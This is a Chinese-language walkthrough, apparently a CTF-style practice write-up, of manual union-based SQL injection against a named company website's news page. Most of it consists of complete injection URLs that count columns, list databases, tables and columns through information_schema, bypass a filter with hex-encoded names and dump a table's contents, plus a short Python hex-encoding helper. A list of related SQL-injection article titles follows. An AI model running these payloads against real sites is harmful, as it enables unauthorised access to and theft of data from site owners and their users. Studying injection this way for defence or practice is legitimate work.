write up:web 实战2-注入--sql注入(手工注入详细版)
0x00查找注入点
我是通过展开html标签来找注入点的
注入点
www.kabelindo.co.id/readnews.php?id=28
下面开始盘它!!!
0x01 手动注入
先确定字段数目
先测试3,没有问题
再测试6,出错
再测试5,id=28时,不知道是不是我网的问题加载的很慢,我换成id=1进行测试,发现响应没有问题
这就确定了字段有5个
可以进一步验证:
查一下数据库名
查一下数据库版本
为了防止其他信息的干扰:id=-1
MariaDB数据库管理系统是MySQL的一个分支,主要由开源社区在维护,采用GPL授权许可 MariaDB的目的是完全兼容MySQL,包括API和命令行,使之能轻松成为MySQL的代替品。在存储引擎方面,使用XtraDB(英语:XtraDB)来代替MySQL的InnoDB。–度娘
也可以查查用户
(多练习一下~)
先切入正题
爆出表名
http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database()
上面的就是表名
这里有一个问题,查出来的表名是乱序的
(我尝试了将现在查出来的表名的最后一个当flag提交并不正确!!)
这里表名不是很多,可以一个一个去试,但是这比较笨~。
我思考了一下,数据库中的表名是不是字典序呢?
先按表名(即这里的第二个字段)排序,交最后一个试试:
http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=database() order by 2
flag{tbnomax}
拿去提交提交,的确就是正确答案~
所以数据库中表名是按字典序排序的猜想貌似得到了验证啊~~
补充:学了数据库的都知道,order默认是升序(ASC),降序为(DESC)。
0x03在这题中多加练习
爆出所有数据库名
http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata
group_concat()
是将查询到的结果放到同一个组中
如果数据库名为敏感字段
直接用敏感字段查询不到结果,
可以将数据库名转换为16进制再查询。
(上面数据库名直接使用的database(),所以绕过了敏感字段检查)
‘u9897uwx_kabel’ = ‘0x75393839377577785f6b6162656c’
字符串转16进制的脚本
import binascii
s = 'u9897uwx_kabel'
str_hex = binascii.b2a_hex(s.encode('utf-8'))
print(str_hex)
#之后加上0x前缀!!!
http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,table_name,3,4,5 from information_schema.tables where table_schema=0x75393839377577785f6b6162656c order by 2
和database()效果一样,具体原因有待研究。
单独查一下’informtion_schema’=‘0x696e666f726d74696f6e5f736368656d61’,
http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(table_name),user(),4 ,5 from information_schema.tables where table_schema=0x696e666f726d6174696f6e5f736368656d61
查询某张表中的字段
(这里表名也是敏感字段,同理进行16进制编码)
‘tbnomax’ = ‘0x74626e6f6d6178’
http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,column_name,3,4,5 from information_schema.columns where table_name=0x74626e6f6d6178
查找表中的具体内容
此时表名不是敏感字段了
http://www.kabelindo.co.id/readnews.php?id=-1 union select 1,group_concat(nokode,nogrp,nomax),3,4,5 from tbnomax
这篇 ----- 》 end~
write up:web 实战2-注入--sql注入(手工注入详细版)相关推荐
- SQL注入题型(手工注入+sqlmap)
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用'以及and或者or来进行查看 ...
- SQL server手工注入入门
安全库:http://www.seclibs.com/ 网络安全爱好者的安全导航,专注收集信安.红队常用网站.工具和技术博客 目录 0x01 SQL server基础 0x02 基本注入 SQL se ...
- insert注入:SQL之insert注入
insert用法 innsert在数据库中可以直接插入数据,同时,insert还可以在数据库查询语句中用作字符串替换,例如: select insert("admin", 1, 1 ...
- mysql手工注入imformation_mysql 简单手工注入
来源 dvwa 平台 级别为Low 中的SQL Injection 试题 1. 判断注入点 # 网址?id=1 id=1\ id=1'# 页面如果报错多了一个单引号,那么说明可能存在注入点 'id=1 ...
- mssql和mysql注入区别_Mssql手工注入小结
前言: 说起sql注入环境,网上流行的一些漏洞靶场基本上都是基于Mysql+Apache搭建的,所以我对mysql的手注及提权多多少少有一定的了解,但对mssql还很陌生,为了避免过度依赖sqlmap ...
- mysql 手工注入教程_mysql手工注入步骤
1.一般用 ' " ) 等符号来闭合,再用%23(即#)来注释后面语句. 2.查找数据库,先用order by n猜字段,再用union select 1,2,3 ...n%23来查询. ...
- WarGame系列之Natas(Web安全)通关指北(初级篇0-10)详细版
*OverTheWire社区是一个提供wargame的网站,可以帮助安全爱好者以趣味的方式进行学习.练习安全知识. 本系列文章旨在记录笔者通关思路,其中解题思路也会参考借鉴网上已有文章,在此感谢相关作 ...
- 【C 语言之项目实战】生成随机数并排序(详细版)
目录 1.项目要求 2.定义模块函数 3.各模块函数实现 4.项目源代码 1. 项目要求 1.1 定义大小为 100 的整型数组,使用随机函数给数组元素赋值. 1.2 数组中的数值的范围为 0 - 1 ...
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
最新文章
- Uncode系列开源组件简介
- shell去除字符串前所有的0
- python装饰器类-Python 装饰器、类装饰器、属性装饰器
- 微服务注册发现集群搭建——Registrator + Consul + Consul-template + nginx
- python计算两个日期的差
- (三)、dubbo环境的搭建
- 山东大学2017-2018年校历
- 联想y7000p怎么连接显示器_惠普暗影精灵6和联想拯救者y7000p 2020款如何选?这里详细对比...
- 58天 -算法 openJudge百炼 2787-凑24 - 递归
- 跑步呼吸方法(细胞分裂呼吸法)
- MyBatis学习总结(23)——Mybatis打印Sql语句配置
- oracle排序后第一条,Oracle排序取第一条数据
- 【验证码识别】OpenCV挑战极验滑动拼图验证码
- 利用python读取SEGY格式数据,主要用于对其快速解析及统计分析。
- mantis apache mysql_Nginx、Apache、PHP、Mantis上传文件和附件大小设置
- BUG记录——解析程序包出现错误
- 桌面运维之windows部分常用命令
- 互联网营销的技巧方法和套路!
- “为物联网提供分散的隐私保护医疗区块链”外文翻译——2019年5月份
- 短视频SDK超级简单易用